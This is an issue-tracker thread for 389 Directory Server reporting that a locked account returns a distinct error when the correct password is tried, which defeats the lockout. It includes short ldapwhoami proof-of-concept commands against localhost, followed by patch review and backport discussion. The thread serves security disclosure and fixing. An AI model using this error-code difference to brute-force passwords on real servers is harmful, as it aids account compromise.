The directory server password lockout policy prevents binds from operating once a threshold of failed passwords has been met. During this lockout, if you bind with a successful password, a different error code is returned. This means that an attacker has no ratelimit or penalty during an account lock, and can continue to attempt passwords via bruteforce.
Proof of concept:
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w password dn: uid=testuser,dc=example,dc=com
Bind with invalid credentials a number of times to trigger the lockout:
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w passworda ldap_bind: Invalid credentials (49)
Then bind with valid crendentials while the lockout is in effect:
ldapwhoami -H ldap://localhost -x -D 'uid=testuser,dc=example,dc=com' -w password ldap_bind: Constraint violation (19) additional info: Exceed password retry limit. Please try later.
Workaround: Use PBKDF2_SHA256 to delay the rate at which an attacker can attempt binds. Limit the number of threads allowed to anonymous.
Metadata Update from @firstyear: - Custom field component adjusted to None - Custom field origin adjusted to None - Custom field reviewstatus adjusted to None - Custom field type adjusted to None - Custom field version adjusted to None
Metadata Update from @firstyear: - Issue assigned to firstyear - Issue priority set to: critical - Issue tagged with: Security
<img alt="0001-Ticket-49336-SECURITY-Locked-account-provides-differ.patch" src="/389-ds-base/issue/raw/files/2b4ac80f5ecc5e4903e303103771fd1d03d4c61ce09d2fa46ab000de7bbc6baa-0001-Ticket-49336-SECURITY-Locked-account-provides-differ.patch" />
Passes all password tests: 28 passed in 165.95 second
Metadata Update from @firstyear: - Custom field reviewstatus adjusted to review (was: None)
The patch looks good to me. Ack
Metadata Update from @tbordaz: - Custom field reviewstatus adjusted to ack (was: review)
commit 33db32a To ssh://git@pagure.io/389-ds-base.git 58c4f95..33db32a master -> master
<img alt="0001-Ticket-49336-SECURITY-1.2.11.x-Locked-account-provid.patch" src="/389-ds-base/issue/raw/files/20012359852eda4f460669c89704f3f31aa8a349965c893f277daaa5abd10380-0001-Ticket-49336-SECURITY-1.2.11.x-Locked-account-provid.patch" />
I'll need some help testing this one from @vashirov or @spichugi as I have some issues with the 1.2.x env setup :(
<img alt="0001-Ticket-49336-SECURITY-1.3.5.x-Locked-account-provide.patch" src="/389-ds-base/issue/raw/files/5dc8f74d8b9cb312b4d3562edecdda0ab645fd48d452ca1b412968f739a997bc-0001-Ticket-49336-SECURITY-1.3.5.x-Locked-account-provide.patch" />
passes the security test.
<img alt="0001-Ticket-49336-SECURITY-Locked-account-provides-differ.patch" src="/389-ds-base/issue/raw/files/0cf85914e083173ea365f547dea9f5417d34ec11ae8fb10b26292b8e89f78431-0001-Ticket-49336-SECURITY-Locked-account-provides-differ.patch" />
This is the 1.3.6 patch.
Metadata Update from @firstyear: - Custom field reviewstatus adjusted to review (was: ack)
I'll need some help testing this one from @vashirov or @spichugi as I have some issues with the 1.2.x env setup :( Test passed for the scratch build: https://vashirov.fedorapeople.org/share/report-1.2.11.15-92.html
Thanks @vashirov you are a legend.
@tbordaz can you check the backports? Are you okay for me to add these to the listed versions?
@tbordaz @mreynolds Can you check these backports?
Ack on the 1.3.5 & 1.3.6 backport (we need to get the 1.3.6 patch pushed ASAP). And I'm not sure we need to 1.2.11 patch.
Pushed the 1.3.6 patch:
c903f66..95b39e2 389-ds-base-1.3.6 -> 389-ds-base-1.3.6
Thanks @mreynolds I'll push the 1.3.5 and master patches now.
commit 4cce166 To ssh://git@pagure.io/389-ds-base.git faaa62c..4cce166 389-ds-base-1.3.5 -> 389-ds-base-1.3.5
Metadata Update from @firstyear: - Issue close_status updated to: fixed - Issue status updated to: Closed (was: Open)
389-ds-base is moving from Pagure to Github. This means that new issues and pull requests will be accepted only in 389-ds-base's github repository.
This issue has been cloned to Github and is available here: - https://github.com/389ds/389-ds-base/issues/2395
If you want to receive further updates on the issue, please navigate to the github issue and click on subscribe button.
subscribe
Thank you for understanding. We apologize for all inconvenience.
Metadata Update from @spichugi: - Issue close_status updated to: wontfix (was: fixed)
Login to comment on this ticket.